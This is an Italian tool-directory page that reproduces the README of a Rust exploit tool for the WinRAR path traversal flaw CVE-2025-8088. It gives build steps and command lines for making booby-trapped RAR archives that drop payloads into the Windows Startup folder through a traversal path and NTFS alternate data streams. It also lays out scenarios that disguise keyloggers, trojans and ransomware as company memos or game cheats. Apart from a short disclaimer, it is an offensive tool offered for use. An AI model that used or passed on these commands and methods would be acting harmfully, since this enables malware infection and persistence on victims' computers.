Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
WinRAR-Exploit-Tool---Rust-Edition — Un'implementazione ad alte prestazioni e sicura in termini di memoria del tool di exploit WinRAR CVE-2025-8088, riscritto in Rust per una migliore affidabilità e prestazioni. | Kitploit
Strumenti/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
Meccanismi di PersistenzaExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingApprendimento e FormazioneRed TeamingSviluppo PayloadBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

Un'implementazione ad alte prestazioni e sicura in termini di memoria del tool di exploit WinRAR CVE-2025-8088, riscritto in Rust per una migliore affidabilità e prestazioni.

Vedi Repository
8311 mesi faNon ancora revisionato

WinRAR Exploit Tool - Edizione Rust

Strumento di Exploit per Path Traversal in WinRAR - Scritto in Rust

Un'implementazione ad alte prestazioni e sicura in memoria dello strumento di exploit WinRAR CVE-2025-8088, riscritto in Rust per una maggiore affidabilità e prestazioni.

Caratteristiche

  • Sfruttamento ADS - Flussi di dati alternativi NTFS per nascondere il payload
  • Manipolazione dell'header RAR5 - Patch diretta dell'header per l'iniezione di percorso
  • GUI moderna - Interfaccia basata su GTK con styling CSS
  • Targeting all'avvio - Posizionamento automatico del payload nell'avvio di Windows
  • Supporto per esche personalizzate - Usa i tuoi file esca o quelli predefiniti
  • Supporto file universale - Supporta qualsiasi tipo di file sia per payload che per esca
  • Gestione errori robusta - Controllo completo degli errori e diagnostica
  • Diagnostica di sistema - Verifica automatica della compatibilità del sistema
  • Efficiente in memoria - Basso consumo di memoria con gestione intelligente delle risorse

Requisiti

  • Rust 1.70+ - Toolchain Rust moderna
  • Librerie di sviluppo GTK - Per il supporto GUI
  • WinRAR CLI - Per la creazione di archivi RAR
  • Windows 10/11 - Richiesto supporto NTFS

Avvio rapido

1. Installa Rust

root@kitploit:~
# Install Rust using rustup


# Verify installation
rustc --version
cargo --version

2. Installa le librerie di sviluppo GTK

Windows (MSVC)

root@kitploit:~
# Using vcpkg
vcpkg install gtk:x64-windows

Oppure usando MSYS2

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. Clona e compila

root@kitploit:~
# Navigate to the rust project
cd winrar_exploit_rust

# Build in debug mode
cargo build

# Build optimized release
cargo build --release

# Run the application
cargo run --release

Utilizzo

  1. Seleziona il Payload - Scegli qualsiasi file come payload (.exe, .bat, .jpg, .pdf, ecc.)
  2. Scegli un'esca - Seleziona qualsiasi file come esca (ne verrà creata una predefinita se vuoto)
  3. Nome dell'archivio - Inserisci il nome del file RAR di output
  4. Compila - Genera l'archivio exploit

Esempi

Utilizzo di base

Crea un exploit semplice con un payload e un file esca:

root@kitploit:~
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

Utilizzo avanzato

Più file esca

root@kitploit:~
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

Directory di drop personalizzata

root@kitploit:~
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

Diversi tipi di payload

root@kitploit:~
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

Diagnostica di sistema

root@kitploit:~
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose

# Show available tools and features
.\winrar_exploit_rust.exe tools

Scenari reali

Scenario 1: Ambiente aziendale

root@kitploit:~
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

Scenario 2: Comunità di gioco

root@kitploit:~
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

Lo strumento crea archivi RAR con path traversal utilizzando:

  1. Creazione ADS - Nasconde il payload nei flussi di dati alternativi NTFS
  2. Costruzione RAR - Crea un RAR base con ADS utilizzando WinRAR CLI
  3. Patch dell'header - Inietta il percorso di traversal negli header RAR5
  4. Ricalcolo CRC - Assicura l'integrità dell'archivio
  5. Output - Consegna l'RAR malizioso pronto per l'estrazione

Esempio di percorso: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Tipi di file supportati

File payload:

  • ✅ Eseguibili (.exe, .bat, .cmd)
  • ✅ Script (.py, .js, .vbs, .ps1)
  • ✅ Documenti (.pdf, .docx, .xlsx)
  • ✅ Immagini (.jpg, .png, .gif)
  • ✅ Video (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Qualsiasi tipo di file

File esca:

  • ✅ File di testo (.txt, .doc, .pdf)
  • ✅ Immagini (.jpg, .png, .gif, .bmp)
  • ✅ Video (.mp4, .avi)
  • ✅ Audio (.mp3, .wav)
  • ✅ Documenti (.docx, .xlsx)
  • ✅ Qualsiasi tipo di file

Architettura

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Application entry point
│   ├── gui.rs           # GTK-based user interface
│   ├── exploit.rs       # Core exploit logic
│   ├── ads.rs           # NTFS ADS manipulation
│   ├── rar.rs           # RAR5 header manipulation
│   ├── diagnostics.rs   # System diagnostics
│   └── error.rs         # Error handling
├── Cargo.toml           # Dependencies and build config
└── README.md           # This file

Risoluzione dei problemi

Lo strumento include la diagnostica automatica che controlla:

  • ✅ Installazione di WinRAR CLI
  • ✅ Supporto ADS NTFS
  • ✅ Autorizzazioni della directory di avvio
  • ✅ Disponibilità libreria GTK
  • ✅ Compatibilità del file system

Problemi comuni:

  1. "GTK non trovato"

    root@kitploit:~
    # Install GTK development libraries
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # Or using MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. "WinRAR CLI non trovato"

    • Installa WinRAR da https://www.winrar.com
    • Assicurati che rar.exe sia in Program Files
  3. "Impossibile scrivere nella directory di avvio"

    • Esegui lo strumento come amministratore
    • Controlla i permessi della cartella
  4. "ADS NTFS non supportato"

    • Assicurati di usare il file system NTFS
    • ADS non è supportato su FAT32/exFAT
  5. Errori di compilazione

    root@kitploit:~
    # Update Rust toolchain
    rustup update
    
    # Clean and rebuild
    cargo clean
    cargo build --release
    

Formattazione del codice

root@kitploit:~
# Format code
cargo fmt

# Lint code
cargo clippy

Dipendenze

Le dipendenze principali includono:

  • gtk - Framework GUI moderno
  • tokio - Runtime asincrono
  • windows - Binding API Windows
  • crc32fast - Calcolo veloce CRC32
  • byteorder - Manipolazione dell'ordine dei byte
  • anyhow - Gestione errori

Considerazioni sulla sicurezza

  • Scopo educativo: Questo strumento è solo per test autorizzati e scopi educativi
  • Ambiente controllato: Utilizzare solo in ambienti controllati con il giusto consenso
  • Conformità legale: Assicurare il rispetto delle leggi e dei regolamenti applicabili
  • Divulgazione responsabile: Seguire le pratiche di divulgazione responsabile

Licenza

Questo progetto è concesso in licenza sotto la licenza MIT - vedi il file LICENSE per i dettagli.

Autore

Realizzato da @kanonufo su Telegram


Strumento red team ad alte prestazioni per lo sfruttamento di CVE-2025-8088 - Edizione Rust

Scarica lo strumento